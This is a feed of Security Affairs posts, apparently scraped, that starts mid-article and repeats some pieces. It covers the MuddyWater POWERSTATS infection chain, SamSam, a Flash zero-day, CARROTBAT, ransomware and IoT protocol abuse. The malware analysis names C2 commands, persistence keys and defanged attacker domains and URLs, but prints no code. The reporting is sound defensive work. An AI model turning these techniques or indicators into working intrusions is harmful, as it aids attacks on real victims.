In fact, the next malicious stage is executed only when the “Math.round(ss) % 20 == 19” condition is met, otherwise it keeps re-executing itself. The “ss” variable stores the past seconds since 1 January 1970 00:00:00.

The final stage consists in the execution of the POWERSTATS backdoor contained into the “Microsoft.db” file. The backdoor contacts a couple of domain names: “hxxp://amphira[.com” and “hxxps://amorenvena[.com”, each one pointing to the same ip address 139.162.245.200 (EU-LINODE-20141229 US).

Figure 7. POWERSTAT beaconing requests

One executed, the POWERSTAT malware sends generic information about the victim’s machine to the remote server through an encoded HTTP POST request:

Figure 8. Post request containing info about the victim machine

Then, it starts its communication protocol with the C2, asking for commands to execute on the compromised host.

The HTTP parameter “type” classifies the kind request performed by the malicious implant, during the analysis the following values have been observed:

  • info: used in POST request to send info about the victim;
  • live: used in POST request as ping mechanism;
  • cmd: used both in POST and GET requests. In the first case it sends the last command executed, in the second one it retrieves a new command from server;
  • res: used in a POST request to send the result of the last command that the malware has executed.

The parameter “id”, instead, uniquely identify the victim machine and it is calculated using the local system info, despite the sample analyzed by TrendMicro which uses only the hard drive serial number.  This identifier is also used to create a file into the “C:\ProgramData\” folder, used to store temporary information.

Figure 9. Victim id creation

Analyzing the code extracted and deobfuscated from the “Microsoft.db” file, it is possible to investigate the real capabilities of the POWERSTATS backdoor, identifying the functionalities supported by a malicious implant, such as:

  • upload: the malware downloads a new file from the specified URL;
  • cmd: the malware executes the specified command;
  • b64: the malware decodes and executes a base64 PowerShell script;
  • muddy: the malware creates a new encrypted file in “C:\\ProgramData\LSASS” containing a powershell script and runs it.
Figure 10. Deobfuscated POWERSTATS code snippet

Persistence

The malware implements more than one persistence mechanism. These mechanisms are triggered only in the final stage of the infection, once the POWERSTATS backdoor is executed. The persistence functionalities use simple and known techniques such as redundant registry keys within the “Microsoft\Windows\CurrentVerison\Run” location:

Figure 11. Registry key based persistence mechanism

And the creation of a scheduled task named “MicrosoftEdge”, started every day at 12 o’clock.

Figure 12. Scheduled task installed by the malware

Conclusion

This last campaign of the Iranian ATP group “MuddyWater“ shows a clear example of how hacking groups can leverage system’s tools and scripting languages to achieve their objectives, maintain a foothold within their target hosts and exfiltrate data. These attacks also leverage macro-embedded document as the initial vector, showing how this “well-known” technique can still represent a relevant threat, especially if carefully prepared and contextualized to lure specific victims.

Figure 13.  MuddyWaters’ Infection chain 

Technical details, including Indicator of compromise and Yara rules are reported in the analysis published on the Yoroi blog.https://blog.yoroi.company/research/dissecting-the-muddywater-infection-chain/

Pierluigi Paganini

(Security Affairs – MuddyWater, APT)

The post Experts at Yoroi – Cybaze Z-Lab analyzed MuddyWater Infection Chain appeared first on Security Affairs.



Security Affairs

Experts at Yoroi – Cybaze Z-Lab analyzed MuddyWater Infection Chain

Malware researchers at Yoroi – Cybaze Z-Lab analyzed the MuddyWater Infection Chain observed in a last wave of cyber attacks.

Introduction

At the end of November, some Middle East countries have been targeted by a new wave of attacks related to the Iranian APT group known as “MuddyWater“: their first campaign was observed back in 2017 and more recently Unit42 researchers reported attacks in the ME area. The MuddyWater’s TTPs seem to be quite invariant during this time-period: they keep using spear-phishing emails containing blurred document in order to induce the target to enable the execution of VB-macro code, to infect the host with POWERSTAT malware.

Figure 1. Malicious document

According to the analysis of ClearSky Research Team and TrendMicro researchers, at the end of November, MuddyWater group hit Lebanon and Oman institutions and after a few days Turkish entities. The attack vector and the final payload of were the same: the usual macro-embedded document and the POWERSTAT backdoor respectively.

However, the intermediate stages were slightly different than usual.

The Yoroi-Cybaze Zlab researchers analyzed the file “Cv.doc”, the blurred resume used by MuddyWater during their Lebanon/Oman campaign.

Technical Analysis

When the victim enables the MACRO execution, the malicious code creates an Excel document containing the necessary code to download the next-stage of the malicious implant. At the same time, it shows a fake error popup saying the Office version is incompatible.

Figure 2. Fake error message

The macro code is decrypted before the execution with the following custom routine:

Figure 3. Macro decryption routine

After the deobfuscation of the code, it’s possible to identify the function used to create the hidden Excel document within the “x1” variable:

Figure 4. Creation of the hidden document

The macro placed into the new Excel downloads powershell code from an URL apparently referencing a PNG image file “http://pazazta[.]com/app/icon.png”. The downloaded payload is able to create three new local files:

  • C:\Windows\Temp\temp.jpg, containing Javascript code;
  • C:\Windows\Temp\Windows.vbe, containing an encoded Visual Basic script;
  • C:\ProgramData\Microsoft.db, containing the encrypted final payload.
Figure 5. Downloaded Powershell code

As shown in the above figure, the first file to be executed is “Windows.vbe” which simply run the Javascript code contained into temp.jpg, using the CSCRIPT engine. After its decryption, it is possible to notice the JS purpose: delay the execution of another powershell payload.

Figure 6. Javascript code within “temp.jpg”

In fact, the next malicious stage is executed only when the “Math.round(ss) % 20 == 19” condition is met, otherwise it keeps re-executing itself. The “ss” variable stores the past seconds since 1 January 1970 00:00:00.

The final stage consists in the execution of the POWERSTATS backdoor contained into the “Microsoft.db” file. The backdoor contacts a couple of domain names: “hxxp://amphira[.com” and “hxxps://amorenvena[.com”, each one pointing to the same ip address 139.162.245.200 (EU-LINODE-20141229 US).

Figure 7. POWERSTAT beaconing requests

One executed, the POWERSTAT malware sends generic information about the victim’s machine to the remote server through an encoded HTTP POST request:

Figure 8. Post request containing info about the victim machine

Then, it starts its communication protocol with the C2, asking for commands to execute on the compromised host.

The HTTP parameter “type” classifies the kind request performed by the malicious implant, during the analysis the following values have been observed:

  • info: used in POST request to send info about the victim;
  • live: used in POST request as ping mechanism;
  • cmd: used both in POST and GET requests. In the first case it sends the last command executed, in the second one it retrieves a new command from server;
  • res: used in a POST request to send the result of the last command that the malware has executed.

The parameter “id”, instead, uniquely identify the victim machine and it is calculated using the local system info, despite the sample analyzed by TrendMicro which uses only the hard drive serial number.  This identifier is also used to create a file into the “C:\ProgramData\” folder, used to store temporary information.

Figure 9. Victim id creation

Analyzing the code extracted and deobfuscated from the “Microsoft.db” file, it is possible to investigate the real capabilities of the POWERSTATS backdoor, identifying the functionalities supported by a malicious implant, such as:

  • upload: the malware downloads a new file from the specified URL;
  • cmd: the malware executes the specified command;
  • b64: the malware decodes and executes a base64 PowerShell script;
  • muddy: the malware creates a new encrypted file in “C:\\ProgramData\LSASS” containing a powershell script and runs it.
Figure 10. Deobfuscated POWERSTATS code snippet

Persistence

The malware implements more than one persistence mechanism. These mechanisms are triggered only in the final stage of the infection, once the POWERSTATS backdoor is executed. The persistence functionalities use simple and known techniques such as redundant registry keys within the “Microsoft\Windows\CurrentVerison\Run” location:

Figure 11. Registry key based persistence mechanism

And the creation of a scheduled task named “MicrosoftEdge”, started every day at 12 o’clock.

Figure 12. Scheduled task installed by the malware

Conclusion

This last campaign of the Iranian ATP group “MuddyWater“ shows a clear example of how hacking groups can leverage system’s tools and scripting languages to achieve their objectives, maintain a foothold within their target hosts and exfiltrate data. These attacks also leverage macro-embedded document as the initial vector, showing how this “well-known” technique can still represent a relevant threat, especially if carefully prepared and contextualized to lure specific victims.

Figure 13.  MuddyWaters’ Infection chain 

Technical details, including Indicator of compromise and Yara rules are reported in the analysis published on the Yoroi blog.https://blog.yoroi.company/research/dissecting-the-muddywater-infection-chain/

Pierluigi Paganini

(Security Affairs – MuddyWater, APT)

The post Experts at Yoroi – Cybaze Z-Lab analyzed MuddyWater Infection Chain appeared first on Security Affairs.

Evidence in Marriott’s subsidiary Starwood hack points out to China intel

According to a report published by the Reuters, the massive Marriott data breach was carried out by Chinese state-sponsored hackers.

According to the Reuters, people investigating the Marriot data breach believe that it is the result of a cyberattack carried out by Chinese hackers.

Last week Marriott International announced that hackers compromised guest reservation database at its subsidiary Starwood hotels and stolen personal details of about 500 million guests.

Sources quoted by the media agency revealed that the attack was carried out by the Chinese intelligence to gather information.

“Hackers behind a massive breach at hotel group Marriott International Inc left clues suggesting they were working for a Chinese government intelligence gathering operation, according to sources familiar with the matter.” reads the article published by the Reuters.

“Private investigators looking into the breach have found hacking tools, techniques and procedures previously used in attacks attributed to Chinese hackers, said three sources who were not authorized to discuss the company’s private probe into the attack.”

The attribution of the Marriott data breach is based on the analysis of tactics, techniques, and procedures (TTPs) that were previously associated with Chinese APT groups.

In particular, Reuters’ sources admitted that some of the tools were exclusively used by Chinese attackers. The attribution is also difficult because the security breach occurred back in 2014, this means that since then other threat actors may have had access to the Starwood systems.

The relations between China and US are even more complicated, US Government accused in many circumstances Beijing of cyber espionage against Western entities.

Chinese authorities denied any involvement in the alleged cyber espionage operations.

“China firmly opposes all forms of cyber attack and cracks down on them in accordance with law,” Chinese Ministry of Foreign Affairs spokesman Geng Shuang told Reuters.”If offered evidence, the relevant Chinese departments will carry out investigations according to law.”

Starwood Data Breach

Marriott International has bought Starwood Hotels and Resorts Worldwide in 2016 for $13 billion. The brand includes St. Regis, Sheraton Hotels & Resorts, W Hotels, Westin Hotels & Resorts, Aloft Hotels, Tribute Portfolio, Element Hotels, Le Méridien Hotels & Resorts, The Luxury Collection, Four Points by Sheraton and Design Hotels.

According to the company, hackers accessed to the Starwood’s guest reservation system since 2014 and copied and encrypted the information.

The intrusion was detected on September 8 when a monitoring system found evidence regarding an attempt to access the Starwood guest reservation database in the United States. Two months later, on November 19, an investigation confirmed the intrusion into the archive containing “guest information relating to reservations at Starwood properties on or before September 10, 2018.”

Unknown hackers accessed personal information of nearly 327 million guests, compromised records include names, mailing addresses, phone numbers, email addresses, passport numbers, dates of birth, genders, arrival and departure information, reservation date.

Pierluigi Paganini

(Security Affairs – Marriot Data breach, hacking)

The post Evidence in Marriott’s subsidiary Starwood hack points out to China intel appeared first on Security Affairs.

Toyota presented PASTA (Portable Automotive Security Testbed) Car-Hacking Tool

Takuya Yoshida from Toyota’s InfoTechnology Center and his colleague Tsuyoshi Toyama are members of a Toyota team that developed the new tool, called PASTA (Portable Automotive Security Testbed).

PASTA is an open-source testing platform specifically designed for car hacking, it was developed to help experts to test cyber security features of modern vehicles.

At the BLACK HAT EUROPE 2018 held in London the duo presented the tool and confirmed that  Toyota plans to share the specifications on Github and will start selling the fully built system in Japan.

The PASTA car hacking tool is contained in an 8 kg portable briefcase, experts highlighted the delay of the automotive industry in developing cyber security for modern cars.

“The researchers integrated the tool with a driving simulator program, as well as with a model car to demonstrate some ways it can be used. PASTA also can be used for R&D purposes with real vehicles: that would allow a carmaker to test how a third party feature would affect the vehicle and its security, or reprogram firmware, for example.” reported DarkReading.

PASTA

Source: Dark Reading

Giving a close look at pasta case, we can find four ECUs inside, as well as a console to run tests of the car system operation or to carry out attacks, for example injecting CAN messages.

“There was a delay in the development of cybersecurity in the automobile industry; [it’s] late,” explained Toyama.

Now automakers including Toyota are preparing for next-generation attacks, he said, but there remains a lack of security engineers that understand auto technology.

The tool allows researchers to test communications among components of the vehicle through CAN protocol as well as analyzed engine control units (ECUs) operate of the vehicles.

Watch out, the PASTA was not designed for hacking scenarios like the one presented by the security duo Charlie Miller and Chris Valasek in 2015 when they remotely hacked a Fiat Chrysler connected car.

PASTA implements a simulation for remote operation of vehicle components and features, including wheels, brakes, windows, and other car functionalities.

“It’s small and portable so users can study, research, and hack with it anywhere.” continues the expert.

PASTA supports connections to ODBII, RS232C ports, and a port for debugging or binary hacking.

“You can modify the programming of ECUs in C” as well, he said.

Among future improvements for PASTA there is the implementation of other connectivity features, including Ethernet, LIN, and CAN FD, Wi-Fi and of course Bluetooth.

You can download slides and the research paper from the following link:

• Download Presentation Slides
• Download White Paper

Pierluigi Paganini

(Security Affairs – car hacking, PASTA)

The post Toyota presented PASTA (Portable Automotive Security Testbed) Car-Hacking Tool appeared first on Security Affairs.

Ukraine’s SBU: Russia carried out a cyberattack on Judiciary Systems

Ukraine is accusing Russian intelligence services of carrying out cyberattacks against one of its government organizations.

Ukraine’s security service SBU announced to have blocked a cyber attack launched by Russian intelligence aimed at breaching information and telecommunications systems used by the country’s judiciary.

Attackers launched a spear phishing attack using messages purporting to deliver accounting documents. The weaponized document included a strain of malware that was developed to disrupt the exfiltrate data and disrupt the Judiciary Systems.

Ukrainian government experts were able to determine the command and control (C&C) infrastructure that is using Russian IP addresses.

The attack was detected and neutralized thanks to the efforts of  result of collaboration between the State Service on Intellectual Property (SSIP) and the State Judicial Administration.

“Employees of the Security Service of Ukraine blocked the attempt of Russian special services to conduct a large-scale cyberattack on the information and telecommunication systems of the judiciary of Ukraine. Specialists of the SBU noted that the cyberattack began due to the sending by e-mail of counterfeit accounting documents infected by the virus.” reads the alert published by the SBU.

“After opening files on computers, malicious software for unauthorized interference with judicial information systems and theft of official information were hidden. Employees of the Security Service of Ukraine found that the detected virus program was connected from control-command servers that have, in particular, Russian IP addresses.”

In July, Ukraine ‘s SBU Security Service reportedly stopped VPNFilter attack at chlorine station, the malware infected the network equipment in the facility that supplies water treatment and sewage plants.

VPNFilter is a multi-stage, modular strain of malware that has a wide range of capabilities for both cyber espionage and sabotage purpose, it is originating from Russia.

Technical analysis of the code revealed many similarities with another nation-state malware, the BlackEnergy malware that was specifically designed to target ISC-SCADA systems and attributed to Russian threat actors. BlackEnergy is considered the key element in the attack aimed at Ukrainian power grid in 2015 and 2016, it was also involved in attacks against mining and railway systems in the country.

This week, Adobe released security updates for Flash Player that address two vulnerabilities, including a zero-day flaw, tracked as CVE-2018-15982, exploited in targeted attacks.

Experts observed the exploitation of the Flash zero-day exploit in an attack aimed at the FSBI “Polyclinic No. 2” of the Administrative Directorate of the President of the Russian Federation.

Once opened, the decoy document shows a questionnaire for personnel of the Moscow-based hospital, while the zero-day exploit is executed in the background.

Gigamon has also published a blog post describing the flaw and the attack, the experts pointed out that the decoy document in Russian language was submitted tVirusTotal from a Ukranian IP address. Qihoo 360 researchers observed the attack was launched just days after the Kerch Strait incident that occurred on November 25, when Russian Federal Security Service (FSB) border service coast guard boats fired upon and captured three Ukrainian Navy vessels that had attempted to pass from the Black Sea into the Sea of Azov through the Kerch Strait while on their way to the port of Mariupol.

Some of the injured crew members were taken to hospitals in Moscow and one of these hospitals could be the Polyclinic No. 2. Malicious documents involved in this attack were uploaded to VirusTotal from a Ukrainian IP address, which could indicate that Ukrainian cyberspies targeted the hospital to obtain information on the state of the crew members.

Pierluigi Paganini

(Security Affairs – Ukraine, Russia)

The post Ukraine’s SBU: Russia carried out a cyberattack on Judiciary Systems appeared first on Security Affairs.

DHS and FBI published a joint alert on SamSam Ransomware

The US Department of Homeland Security (DHS) and the FBI issued a joint alert on SamSam attacks targeting critical infrastructure.

The US Department of Homeland Security (DHS) and the FBI published a joint alert on the activity associated with the infamous SamSam ransomware.

The SamSam hackers extorted over 200 organizations, including public institutions, municipalities, and hospitals, they have caused over $30 million in losses.

In March 2018, computer systems in the City of Atlanta were infected by ransomware, the cyber attack was confirmed by the City officials.

The ransomware infection has caused the interruption of several city’s online services, including “various internal and customer-facing applications” used to pay bills or access court-related information.

One of the latest attacks hit the port of San Diego in September,  the incident impacted the processing park permits and record requests, along with other operations.

In February, SamSam ransomware infected over 2,000 computers at the Colorado Department of Transportation (DOT), the DOT has shut down the infected workstations.

In August, Sophos security firm published a report the SamSam ransomware, its experts tracked Bitcoin addresses managed by the crime gang and discovered that crooks had extorted nearly $6 million from the victims since December 2015 when it appeared in the threat landscape.

“SamSam has earned its creator(s) more than US$5.9 Million since late 2015.
74% of the known victims are based in the United States. Other regions known to have
suffered attacks include Canada, the UK, and the Middle East.” reads the report published by Sophos.

“The largest ransom paid by an individual victim, so far, is valued at US$64,000, a
significantly large amount compared to most ransomware families.”

Sophos tracked the Bitcoin addresses reported in all the SamSam versions it has spotted and discovered that 233 victims paid an overall amount of $5.9 million, the security firm also estimated that the group is netting around $300,000 per month.

A few days ago, the U.S. DoJ charged two Iranian men, Faramarz Shahi Savandi (34) and Mohammad Mehdi Shah Mansouri (27), over their alleged role in creating and spreading the infamous SamSam ransomware.

According to the joint report, most of the victims were located in the United States.

“The SamSam actors targeted multiple industries, including some within critical infrastructure. Victims were located predominately in the United States, but also internationally.” reads the alert.

“Network-wide infections against organizations are far more likely to garner large ransom payments than infections of individual systems. Organizations that provide essential functions have a critical need to resume operations quickly and are more likely to pay larger ransoms.”

SamSam actors leverage vulnerabilities in Windows servers to gain persistent access to the target network and make lateral movements to infect other hosts on the network.

According to the report, attackers used the JexBoss Exploit Kit to compromise JBoss applications. Threat actors use Remote Desktop Protocol (RDP) to gain persistent access to victims’ networks, they use brute force attacks and stolen login credentials.

After obtaining access to the victim’s network, attackers escalate privileges then they drop and execute the malware.

“After gaining access to a particular network, the SamSam actors escalate privileges for administrator rights, drop malware onto the server, and run an executable file, all without victims’ action or authorization. While many ransomware campaigns rely on a victim completing an action, such as opening an email or visiting a compromised website, RDP allows cyber actors to infect victims with minimal detection.” continues the alert.

According to the experts, attackers used stolen RDP credentials that were bought from darknet marketplaces. and used in attacks within hours of purchasing the credentials.

The alert also technical details and the following recommendations to mitigate the threat:

  • Audit your network for systems that use RDP for remote communication. Disable the service if unneeded or install available patches. Users may need to work with their technology venders to confirm that patches will not affect system processes.
  • Verify that all cloud-based virtual machine instances with public IPs have no open RDP ports, especially port 3389, unless there is a valid business reason to keep open RDP ports. Place any system with an open RDP port behind a firewall and require users to use a virtual private network (VPN) to access that system.
  • Enable strong passwords and account lockout policies to defend against brute force attacks.
  • Where possible, apply two-factor authentication.
  • Regularly apply system and software updates.
  • Maintain a good back-up strategy.
  • Enable logging and ensure that logging mechanisms capture RDP logins. Keep logs for a minimum of 90 days and review them regularly to detect intrusion attempts.
  • When creating cloud-based virtual machines, adhere to the cloud provider’s best practices for remote access.
  • Ensure that third parties that require RDP access follow internal policies on remote access.
  • Minimize network exposure for all control system devices. Where possible, disable RDP on critical devices.
  • Regulate and limit external-to-internal RDP connections. When external access to internal resources is required, use secure methods such as VPNs. Of course, VPNs are only as secure as the connected devices.
  • Restrict users’ ability (permissions) to install and run unwanted software applications.
  • Scan for and remove suspicious email attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Disable file and printer sharing services. If these services are required, use strong passwords or Active Directory authentication.

Pierluigi Paganini

(Security Affairs – SamSam ransomware, hacking)

The post DHS and FBI published a joint alert on SamSam Ransomware appeared first on Security Affairs.

CVE-2018-15982 Adobe zero-day exploited in targeted attacks

Adobe released security updates for Flash Player that address two vulnerabilities, including a critical flaw, tracked as CVE-2018-15982, exploited in targeted attacks.

Adobe fixed two flaws including a critical use-after-free bug, tracked as CVE-2018-15982, exploited by an advanced persistent threat actor aimed at a healthcare organization associated with the Russian presidential administration.

The flaw could be exploited by attackers to execute arbitrary code, Adobe addressed it with the release of Flash Player 32.0.0.101 for Windows, macOS, Linux, and Chrome OS.

“Adobe has released security updates for Adobe Flash Player for Windows, macOS, Linux and Chrome OS. These updates address one critical vulnerability in Adobe Flash Player and one important vulnerability in Adobe Flash Player installer.” reads the security advisory published by Adobe.

“Successful exploitation could lead to Arbitrary Code Execution and privilege escalation in the context of the current user respectively. 

Adobe is aware of reports that an exploit for CVE-2018-15982 exists in the wild.”

Adobe confirmed that it is aware of attacks exploiting the flaw in the wild.

Adobe has credited the following experts for reporting the CVE-2018-15982 flaw:

  • Chenming Xu and Ed Miles of Gigamon ATR
  • Yang Kang (@dnpushmen) and Jinquan (@jq0904) of Qihoo 360 Core Security (@360CoreSec)
  • He Zhiqiu, Qu Yifan, Bai Haowen, Zeng Haitao and Gu Liang of 360 Threat Intelligence of 360 Enterprise Security Group
  • independent researcher b2ahex

Attackers used decoy Word documents including Flash file with zero-day vulnerability. The Word document is included in a RAR archive with a JPG picture. When the Flash vulnerability is triggered, the malware extracts the RAT code embedded in the JPG picture.

“The attack strategy is very clever: Flash file with 0day vulnerability is inserted into decoy Word document which is compressed into one RAR file with a JPG picture. When Flash 0day vulnerability is triggered, it will extract out RAT from that JPG picture. Such trick aims to avoid detection of most security software. This RAT has same digital signature as one RAT which is very likely written by Hacking Team, latter was found August 2018. We believe that the new RAT is an upgrade version of Hacking Team’s RAT.” reads the analysis published by 360 the Enterprise Security Group.

“This vulnerability and exploitation code could be reused by cybercriminals even other APT groups for large-scale attacks, we would suggest users to take necessary protection, like applying latest Adobe Flash patch.”

“The vulnerability (CVE-2018-15982) allows for a maliciously crafted Flash object to execute code on a victim’s computer, which enables an attacker to gain command line access to the system.” reads the post published by Gigamon.

The document was submitted to VirusTotal from a Ukranian IP address and contains a purported employment application for a Russian state healthcare clinic. “

Experts observed the exploitation of the Flash zero-day exploit in an attack aimed at the FSBI “Polyclinic No. 2” of the Administrative Directorate of the President of the Russian Federation.

Once opened, the decoy document shows a questionnaire for personnel of the Moscow-based hospital, while the zero-day exploit is executed in the background.

The post CVE-2018-15982 Adobe zero-day exploited in targeted attacks appeared first on Security Affairs.

Fractured Block Campaign: CARROTBAT dropper dupports a dozen decoy document formats

Palo Alto Networks recently discovered a malware dropper, dubbed CARROTBAT, that supports a dozen decoy document file formats to drop many payloads.

Experts from Palo Alto Networks have recently discovered a malware dropper, dubbed CARROTBAT, that supports a dozen decoy document file formats to drop many payloads.

Security experts from Palo Alto Networks have discovered a malware dropper, dubbed CARROTBAT, that could support a dozen decoy document file formats to drop many payloads.

Even if CARROTBAT was first discovered in March 2018, in the past three months experts observed an intensification of the activity associated with the dropper.

CARROTBAT was spotted while threat actors were using it to drop payloads in South and North Korea region, attackers were using subjects such as crypto-currencies, crypto-currency exchanges, and political events for the decoy documents.

“Unit 42 has uncovered a campaign leveraging a previously unreported customized dropper that is being used to deliver lures primarily pertaining to the South Korea and North Korea region. These lures revolve around a series of subjects, including various cryptocurrencies, cryptocurrency exchanges, and political events.” reads the analysis published by Palo Alto Networks.

CARROTBAT was used in an attack against a British government agency in December, at the time threat actors used the decoy documents to drop the SYSCON backdoor.

Palo Alto Networks detected 29 unique CARROTBAT samples since its discovery, they contained a total of 12 unique decoy documents.

Palo Alto Networks tracked the CARROTBAT attacks as Fractured Block, the attackers used 11 decoy document file formats (.doc, .docx, .eml, .hwp, .jpg, .pdf, .png, .ppt, .pptx, .xls, and .xlsx.)

In March attackers were using the dropper to deliver different payloads, including old versions of the SYSCON RAT and new sample of the OceanSalt malware.

Experts pointed out that CARROTBAT is not sophisticated and implements a rudimentary command obfuscation.

Once the embedded decoy document is opened, an obfuscated command is executed on the system to download and execute a remote file via the Microsoft Windows built-in certutil utility.

The analysis of timestamps associated with CARROTBAT samples revealed they have been compiled between March 2018 and September 2018.

Experts observed between March and July attackers using the dropper to deliver multiple instances of SYSCON. Since June, OceanSalt attackers started using it too.

Experts discovered an infrastructure overlap between the CARROTBAT and KONNI malware families.

Cisco Talos team discovered the KONNI malware in May when it was used in targeted attacks aimed at organizations linked to North Korea.

The malware, dubbed by researchers “KONNI,” was undetected for more than 3 years and was used in highly targeted attacks. It was able to avoid detection due to a continuous evolution, the recent versions capable of executing arbitrary code on the target systems and stealing data.

On August, experts at Cylance noticed that the decoy document used in KONNI attacks is similar to the one used in recent campaigns of the DarkHotel APT.

“Finding CARROTBAT provided an important lynchpin in identifying Fractured Block Campaign activity. Using CARROTBAT, we were able to find related OceanSalt, SYSCON and KONNI activity.”  Palo Alto Networks concludes. 

“The various overlaps encountered are notable, and it is our suspicion that this threat activity may all belong to the same threat actor. However, we do not believe there to be enough evidence at this time to make this claim with complete certainty.”

Pierluigi Paganini

(Security Affairs – Sofacy, Brexit)

The post Fractured Block Campaign: CARROTBAT dropper dupports a dozen decoy document formats appeared first on Security Affairs.

Email accounts of top NRCC officials were hacked in 2018

Threat actors had access to the email accounts of at least four NRCC aides and spied on thousands of sent and received emails for several months.

The email system at the National Republican Congressional Committee (NRCC), the Republican Party’s campaigning arm, was hacked.

The news was first reported by Politico, later the committee admitted the intrusion and confirmed that attackers had access to mail messages for months.

Threat actors had access to the email accounts of at least four NRCC aides and spied on thousands of sent and received emails for several months.

“The House GOP campaign arm suffered a major hack during the 2018 midterm campaigns, exposing thousands of sensitive emails to an outside intruder, according to three senior party officials.” states the report published by Politico.

“The email accounts of four senior aides at the National Republican Congressional Committee were surveilled for several months, the party officials said. The intrusion was detected in April by an NRCC vendor, who alerted the committee and its cybersecurity contractor. An internal investigation was initiated, and the FBI was alerted to the attack, said the officials, who requested anonymity to discuss the incident.”

An NRCC vendor alerted the committee and its cybersecurity contractor in April. The National Republican Congressional Committee alerted the authorities and launched an internal investigation.

Politico reported that senior House Republicans, including Speaker Paul Ryan of Wisconsin, Majority Leader Kevin McCarthy of California and Majority Whip Steve Scalise of Louisiana, were not informed of the intrusion until the media outlet reported it to the NRCC earlier this week.

NRCC focus

It is a difficult moment for the Republican Party that lost 40 seats and gave up majority control to the Democrats in the House after the 2018 mid-term election.

At the time, the attack was not attributed to a specific threat actor, anyway, it is clear that hackers have carried out a cyber espionage campaign.

The attack presents many similarities with the DNC hack occurred before the 2016 election, US intelligence attributed it to Russia-linked APT groups.

It’s not clear, what measures adopted the NRCC to prevent such kind of intrusions, after being notified of the intrusion the committee alerted the security firm Crowdstrike.

“Like other major committees, the NRCC also had security procedures in place before the election cycle began to try to limit the amount of information that could be exposed to a potential hacker. It also employed a full-time cybersecurity employee.” concludes Politico.

Pierluigi Paganini

(Security Affairs – National Republican Congressional Committee (NRCC), hacking)

The post Email accounts of top NRCC officials were hacked in 2018 appeared first on Security Affairs.

New strain of Ransomware infected over 100,000 PCs in China

Security experts reported a new strain of malware spreading in China, the malicious code rapidly infected over 100,000 PCs in just four days.

Unfortunately, the number of infections is rapidly increasing because hackers compromised a supply chain.

It is interesting to note that this ransomware requests victims to pay 110 yuan (nearly Euro 14) in ransom through WeChat Pay.

“On December 1, the first ransomware that demanded the “WeChat payment” ransom broke out in the country. According to the monitoring and evaluation of the “Colvet Threat Intelligence System”, as of the evening of the 4th, the virus infected at least 100,000 computers, not only locked the computer.” reads the analysis published by anti-virus firm Velvet Security

“The document also steals information on tens of thousands of user passwords on platforms such as Taobao and Alipay.” 

Victims are prompted to pay the ransomware to attackers’ WeChat account within 3 days to receive the decryption key. If the victim doesn’t pay the ransomware within a specific time, the malicious code will delete the decryption key from the C&C server.

The malicious code also implements password stealing abilities, the ransomware is able to steal users’ credential for popular Chinese services, including Alipay, NetEase 163 email service, Baidu Cloud Disk, Jingdong (JD.com), Taobao, Tmall , AliWangWang, and QQ websites.

The ransomware also collects information on the infected system, including CPU model, screen resolution, network information and list of installed software.

According to experts from Velvet Security, hackers compromised the supply chain of the “EasyLanguage” programming software used by a large number of application developers.

The tainted software is used by hackers to inject the malicious code into every software compiled through the programming software.

To avoid detection, author of the threat signed the code with a trusted digital certificate issued form from Tencent Technologies and avoid encrypting data in some specific directories, like “Tencent Games, League of Legends, tmp, rtl, and program.

The good news for the victims is that researchers were able to crack the ransomware; the experts discovered that the malware uses XOR cipher, instead of DES, to encrypt the file, it also stores a copy of the decryption key locally on the victim’s system in the following path:

%user%\AppData\Roaming\unname_1989\dataFile\appCfg.cfg

Velvet experts released d a free ransomware decryption tool that could be used to decrypt documents encrypted by the malware.

Experts attributed the ransomware to a software programmer named “Luo,” they reported their discovery to the Chinese authorities.

ransomware author

Pierluigi Paganini

(Security Affairs – cybercrime, China)

The post New strain of Ransomware infected over 100,000 PCs in China appeared first on Security Affairs.

Security Affairs: M2M protocols can be abused to attack IoT and IIoT systems

Security experts from Trend Micro discovered that some machine-to-machine (M2M) protocols can be abused to attack IoT and industrial Internet of Things (IIoT) systems.

According to a study conducted by experts from Trend Micro and the Polytechnic University of Milan. attackers abuse M2M protocols to target IoT and IIoT devices.

The experts analyzed the M2M protocols, the Message Queuing Telemetry Transport (MQTT) and Constrained Application Protocol (CoAP).

The former one is a messaging protocol used to establish communication between a broker and multiple clients, the latter is a UDP client-server protocol that allows communications between nodes.

M2M protocols flaws

The experts pointed out that attackers could abuse M2M protocols for target reconnaissance, industrial espionage, targeted attacks, and to make lateral movements.

Researchers monitored both protocols over a period of four months, they the attacker’s role for their research

“For data gathering, we played the role of a casual attacker with modest resources, scanning the internet for exposed MQTT brokers and CoAP hosts. In just nearly four months, such a “casual attacker” was able to collect 209,944,707 MQTT messages obtained from 78,549 brokers and 19,208,047 CoAP responses from 441,964 servers.” reads the research paper.

The analysis of the MQTT protocol revealed the existence of security flaws that could be exploited to trigger DoS condition or execute arbitrary code. Trend Micro reported vulnerabilities to the developers of the affected software that have quickly released patches.

Below a video PoC of the attacks abusing the MQTT protocols:

The researchers did not find security flaws in the  CoAP protocol, but warned that it is susceptible to IP spoofing, attackers could exploit it for DDoS amplification attacks.

“However, the Request for Comments (RFC) defining the protocol, RFC 7252,5 explicitly pinpoints the security issues (mainly due to the “connectionless” nature of UDP), which we confirmed with a practical experiment.” continues the report.

“On a test network with CoAP clients and servers, we launched an amplification attack with increasing payload size and estimated the maximum bandwidth amplification factor (BAF). According to our estimate, CoAP can reach up to 32 times (32x) amplification factor, which is roughly between the amplification power of DNS and SSDP.”

Experts highlighted the risks that malware in the next future could abuse M2M protocols for malicious activity.

“MQTT and CoAP are data protocols playing a fundamental role in M2M communication among consumer and industrial applications. The presence of unsecure MQTT and CoAP deployments shows no improved security awareness since 2017, when this problem was first highlighted for MQTT.” concludes the report.

“Despite the security recommendations being well highlighted in the CoAP RFC, CoAP already suffers from a deployment problem similar to that affecting MQTT. Both MQTT and CoAP have some features that, even in the absence of implementation vulnerabilities, can be abused to the attacker’s advantage. When deploying or using MQTT and CoAP services, the following practical points should be considered.”

Pierluigi Paganini

(Security Affairs – Daniel’s Hosting, dark web)

The post M2M protocols can be abused to attack IoT and IIoT systems appeared first on Security Affairs.



Security Affairs

M2M protocols can be abused to attack IoT and IIoT systems

Security experts from Trend Micro discovered that some machine-to-machine (M2M) protocols can be abused to attack IoT and industrial Internet of Things (IIoT) systems.

According to a study conducted by experts from Trend Micro and the Polytechnic University of Milan. attackers abuse M2M protocols to target IoT and IIoT devices.

The experts analyzed the M2M protocols, the Message Queuing Telemetry Transport (MQTT) and Constrained Application Protocol (CoAP).

